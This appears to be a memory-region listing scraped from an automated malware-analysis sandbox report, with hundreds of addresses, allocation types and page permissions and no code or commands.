page read and write
A5C0000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
BD75000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
1DE9AD7C000
heap
page read and write
1A91A130000
trusted library allocation
page read and write
9890000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
98A2000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
1350000
direct allocation
page read and write
A650000
trusted library allocation
page read and write
CBE000
heap
page read and write
9750000
trusted library allocation
page read and write
C20000
direct allocation
page read and write
1DE9AD85000
heap
page read and write
219E6431000
heap
page read and write
486C000
trusted library allocation
page read and write
2880C880000
heap
page read and write
5FB0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
E21737E000
stack
page read and write
1DE9AD1A000
heap
page read and write
7610000
trusted library allocation
page read and write
B53000
heap
page read and write
96E0000
trusted library allocation
page read and write
2725B106000
unkown
page read and write
A5C0000
trusted library allocation
page read and write
BD64000
trusted library allocation
page read and write
F7DC4FD000
stack
page read and write
B420000
trusted library allocation
page read and write
8830000
unkown
page read and write
7650000
trusted library allocation
page read and write
171F862A000
heap
page read and write
7B80000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
25969E2A000
heap
page read and write
95E0000
trusted library allocation
page read and write
BC2000
direct allocation
page read and write
9400000
trusted library allocation
page read and write
171F8500000
heap
page read and write
12FE000
stack
page read and write
219E645E000
heap
page read and write
9740000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9795000
unkown
page read and write
9E0E000
unkown
page read and write
B420000
trusted library allocation
page read and write
2A409A62000
heap
page read and write
25969E71000
heap
page read and write
97D0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
2880C8E4000
heap
page read and write
86F0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
8830000
unkown
page read and write
9790000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
A628000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
9650000
unkown
page read and write
96E0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
1DE9AD98000
heap
page read and write
97D0000
trusted library allocation
page read and write
A5C1000
trusted library allocation
page read and write
1DE9AD7A000
heap
page read and write
9760000
trusted library allocation
page execute and read and write
95F0000
unkown
page read and write
B430000
trusted library allocation
page read and write
7606000
trusted library allocation
page read and write
7630000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
2725B3B0000
unkown
page readonly
BA85000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
A790000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
4D40000
trusted library section
page read and write
8830000
trusted library allocation
page read and write
A5B6000
trusted library allocation
page read and write
5290000
heap
page read and write
9A23000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
1A91A010000
trusted library allocation
page read and write
5830000
trusted library allocation
page read and write
86F2000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
A560000
trusted library allocation
page read and write
1302000
direct allocation
page read and write
7550000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
CBD000
heap
page read and write
96E0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
D3C000
heap
page read and write
4CB7000
stack
page read and write
9920000
trusted library allocation
page read and write
2880C8F0000
heap
page read and write
8830000
unkown
page read and write
24CB4DE0000
trusted library allocation
page read and write
1DE9AD71000
heap
page read and write
9870000
trusted library allocation
page read and write
C1A000
heap
page read and write
A5D0000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
A5B8000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
C3CDAFC000
stack
page read and write
B5D0000
trusted library allocation
page read and write
2177EE2A000
heap
page read and write
9780000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
9BCE000
unkown
page read and write
95D0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
138F000
direct allocation
page read and write
1DE9AD85000
heap
page read and write
97D0000
trusted library allocation
page read and write
30F0000
trusted library section
page read and write
4845000
trusted library allocation
page read and write
A5A0000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
10FF000
stack
page read and write
1A915359000
heap
page read and write
1A91A034000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
A560000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
1DE9AD85000
heap
page read and write
95D0000
trusted library allocation
page read and write
9A21000
trusted library allocation
page read and write
BD8A000
trusted library allocation
page read and write
27C54B90000
heap
page read and write
C95000
heap
page read and write
2880C903000
heap
page read and write
95E0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
B170000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
A630000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
134E000
stack
page read and write
819D000
trusted library allocation
page read and write
BAB000
heap
page read and write
9A21000
trusted library allocation
page read and write
E21757A000
stack
page read and write
D7A7D7E000
stack
page read and write
2880C8CD000
heap
page read and write
24CB4EC9000
heap
page read and write
97F0000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
24009900000
heap
page read and write
8020000
trusted library allocation
page read and write
74E000
stack
page read and write
5287000
trusted library allocation
page execute and read and write
7670000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
25969E02000
heap
page read and write
1DE9AD7B000
heap
page read and write
99F0000
trusted library allocation
page read and write
2A40A202000
trusted library allocation
page read and write
B510000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
8820000
trusted library allocation
page execute and read and write
1A91A031000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
1A91A170000
remote allocation
page read and write
B420000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
525D000
trusted library allocation
page execute and read and write
1DE9A488000
heap
page read and write
7570000
trusted library allocation
page read and write
97E0000
trusted library allocation
page execute and read and write
24CB4F02000
heap
page read and write
9790000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
BD52000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
25969E7F000
heap
page read and write
1DE9AD96000
heap
page read and write
2725A5B0000
heap
page read and write
1A91A120000
trusted library allocation
page read and write
A630000
trusted library allocation
page read and write
27C54C13000
heap
page read and write
25969F02000
heap
page read and write
2A409A5D000
heap
page read and write
96B0000
trusted library allocation
page read and write
1DE9B202000
heap
page read and write
98A0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
CDA000
heap
page read and write
85B0000
trusted library allocation
page read and write
2725B160000
unkown
page read and write
A650000
trusted library allocation
page read and write
62E5E7F000
stack
page read and write
9790000
trusted library allocation
page read and write
CCA000
heap
page read and write
98A0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9655000
unkown
page read and write
75F0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
BAB8000
trusted library allocation
page read and write
2725A450000
heap
page read and write
BAB0000
trusted library allocation
page read and write
85D0000
trusted library allocation
page read and write
5A9F000
trusted library allocation
page read and write
5DF7000
trusted library allocation
page read and write
CD7000
heap
page read and write
97F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
1384000
direct allocation
page read and write
76A0000
trusted library allocation
page read and write
1DE9AD00000
heap
page read and write
93F0000
trusted library allocation
page read and write
B200000
trusted library allocation
page read and write
B7E000
stack
page read and write
95D0000
trusted library allocation
page read and write
A5B0000
trusted library allocation
page read and write
7609000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
BB23000
trusted library allocation
page read and write
A590000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
A628000
trusted library allocation
page read and write
5270000
trusted library allocation
page read and write
BAC0000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
97C0000
unkown
page read and write
24CB5700000
heap
page read and write
8830000
trusted library allocation
page read and write
31A7000
heap
page read and write
9400000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
DD4EEFC000
stack
page read and write
9C4D000
unkown
page read and write
450000
trusted library allocation
page read and write
1DE9A4C8000
heap
page read and write
2725A460000
trusted library allocation
page read and write
D37000
heap
page read and write
97F0000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
4BFE000
stack
page read and write
9790000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
8830000
unkown
page read and write
269D8930000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
548A000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
3ACE27E000
stack
page read and write
2725B380000
unkown
page read and write
9420000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
9710000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
A60E000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
9784000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
4C3E000
stack
page read and write
1390000
direct allocation
page read and write
4845000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
520000
remote allocation
page read and write
25969E53000
heap
page read and write
8830000
trusted library allocation
page read and write
D1D000
heap
page read and write
A5D0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
D28000
heap
page read and write
3160000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
BCF5000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
55A1000
trusted library allocation
page read and write
D30000
heap
page read and write
B550000
trusted library allocation
page read and write
1DE9A4FC000
heap
page read and write
A5F0000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
9755000
unkown
page read and write
2725B104000
unkown
page read and write
93D6000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
C2A000
heap
page read and write
269D8229000
heap
page read and write
9B10000
trusted library allocation
page read and write
1DE9A310000
heap
page read and write
A620000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
4841000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
1A91A2C5000
heap
page read and write
93E0000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
8837000
unkown
page read and write
5451000
trusted library allocation
page read and write
BA9E000
trusted library allocation
page read and write
8838000
trusted library allocation
page read and write
14C09BB0000
remote allocation
page read and write
9780000
trusted library allocation
page read and write
604C000
trusted library allocation
page read and write
E6D6AFE000
stack
page read and write
1EB21FE000
stack
page read and write
9810000
trusted library allocation
page read and write
9C8E000
unkown
page read and write
1A914A8C000
heap
page read and write
CBD000
heap
page read and write
B1F0000
trusted library allocation
page read and write
1A9149B0000
heap
page read and write
4F20000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
D3B000
heap
page read and write
B500000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
B170000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
79C1000
heap
page read and write
AE8000
heap
page read and write
1DE9ADA2000
heap
page read and write
98D0000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
2725B3C0000
unkown
page read and write
C3CDBFF000
stack
page read and write
97F0000
trusted library allocation
page read and write
8830000
unkown
page read and write
9780000
trusted library allocation
page read and write
219E647B000
heap
page read and write
CCE000
heap
page read and write
7B80000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
98A5000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
7645000
trusted library allocation
page read and write
9752000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
1DE9AD85000
heap
page read and write
4835000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
30F0000
remote allocation
page read and write
1DE9AD97000
heap
page read and write
1370000
direct allocation
page read and write
240098F0000
heap
page read and write
96E0000
trusted library allocation
page read and write
CAD000
heap
page read and write
93D0000
unkown
page read and write
1DE9AD7B000
heap
page read and write
5FC6000
trusted library allocation
page read and write
9650000
unkown
page read and write
171F8570000
heap
page read and write
9B50000
trusted library allocation
page read and write
9A60000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
1DE9B202000
heap
page read and write
1DE9A46F000
heap
page read and write
1A914A8A000
heap
page read and write
4DF0000
heap
page read and write
EFB017F000
stack
page read and write
A5E4000
trusted library allocation
page read and write
1DE9AD7C000
heap
page read and write
9920000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
B4F0000
trusted library allocation
page read and write
C2C000
heap
page read and write
9810000
trusted library allocation
page read and write
7754000
trusted library allocation
page read and write
7640000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
97E2000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
DD4EAFB000
stack
page read and write
95D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
4E0000
remote allocation
page read and write
1DE9ADA4000
heap
page read and write
9780000
trusted library allocation
page read and write
2725A630000
heap
page read and write
8566000
trusted library allocation
page read and write
86D487E000
stack
page read and write
24CB4E2A000
heap
page read and write
8835000
unkown
page read and write
9D8E000
unkown
page read and write
1DE9AD6C000
heap
page read and write
9810000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
93D0000
trusted library allocation
page read and write
530000
heap
page read and write
BC6000
direct allocation
page read and write
30F0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
C87000
heap
page read and write
9920000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
1DE9B220000
heap
page read and write
B410000
trusted library allocation
page read and write
C31000
heap
page read and write
9690000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
1A915E70000
trusted library allocation
page read and write
BAF7000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
13DC000
direct allocation
page read and write
25969DE0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
86AC000
trusted library allocation
page read and write
BA0000
direct allocation
page read and write
1DE9AD7C000
heap
page read and write
95F0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
334E87E000
stack
page read and write
98D0000
trusted library allocation
page read and write
2DF0000
heap
page read and write
2725A638000
heap
page read and write
440000
heap
page read and write
86D477F000
stack
page read and write
1DE9A4E5000
heap
page read and write
25969E51000
heap
page read and write
985E000
stack
page read and write
8837000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
62E5AFB000
stack
page read and write
93D0000
unkown
page read and write
D32000
heap
page read and write
D20000
heap
page read and write
9780000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
1A915215000
heap
page read and write
24009B00000
heap
page read and write
99D0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
B630000
trusted library allocation
page read and write
9920000
unkown
page read and write
1A914A91000
heap
page read and write
C7A000
heap
page read and write
8830000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
171F8613000
heap
page read and write
C34000
heap
page read and write
7920000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
B80000
direct allocation
page read and write
9780000
unkown
page read and write
9870000
trusted library allocation
page read and write
93F0000
unkown
page read and write
D30000
heap
page read and write
8830000
trusted library allocation
page read and write
7510000
trusted library allocation
page execute and read and write
8830000
trusted library allocation
page read and write
25969E3C000
heap
page read and write
8830000
trusted library allocation
page read and write
9C0E000
unkown
page read and write
5AA8000
trusted library allocation
page read and write
9410000
unkown
page read and write
1DE9AD53000
heap
page read and write
9400000
trusted library allocation
page read and write
3ACE877000
stack
page read and write
97E0000
trusted library allocation
page read and write
1DE9B202000
heap
page read and write
97D0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
1A91A2AE000
heap
page read and write
5240000
trusted library allocation
page read and write
C8D000
heap
page read and write
9785000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
9630000
unkown
page read and write
1DE9AD7B000
heap
page read and write
B460000
trusted library allocation
page read and write
C8E000
heap
page read and write
8830000
unkown
page read and write
8744000
trusted library allocation
page read and write
1DE9AD1A000
heap
page read and write
1A915E60000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
1A91A2ED000
heap
page read and write
97F0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
5280000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
AF0000
heap
page read and write
95D0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
1DE9ADA0000
heap
page read and write
27C54D02000
heap
page read and write
B5A000
heap
page read and write
95F0000
unkown
page read and write
4DCF000
stack
page read and write
9410000
trusted library allocation
page read and write
8610000
trusted library allocation
page read and write
D7A7CFB000
stack
page read and write
1DE9ADC3000
heap
page read and write
B500000
trusted library allocation
page read and write
D20000
heap
page read and write
1DE9AD82000
heap
page read and write
B420000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
8625000
trusted library allocation
page read and write
2880C8F0000
heap
page read and write
EE2351E000
stack
page read and write
4F8D000
stack
page read and write
95F0000
unkown
page read and write
30F0000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
62E58FA000
stack
page read and write
25969BA0000
heap
page read and write
BD39000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
1A919E80000
trusted library allocation
page read and write
A5C4000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
D7A77DB000
stack
page read and write
14C09AF0000
heap
page read and write
30F0000
trusted library allocation
page read and write
2A409A5B000
heap
page read and write
8837000
unkown
page read and write
313E000
stack
page read and write
97B0000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
D0F000
heap
page read and write
31A8000
heap
page read and write
9620000
trusted library allocation
page read and write
99C0000
trusted library allocation
page read and write
C40000
direct allocation
page read and write
9920000
trusted library allocation
page read and write
C60000
heap
page read and write
1A91A040000
trusted library allocation
page read and write
C3CD67C000
stack
page read and write
1A914940000
heap
page read and write
75E0000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
C58000
heap
page read and write
95D0000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
E2178FC000
stack
page read and write
A5B5000
trusted library allocation
page read and write
5340000
trusted library allocation
page readonly
7590000
trusted library allocation
page read and write
There are 3098 hidden memdumps, click here to show them.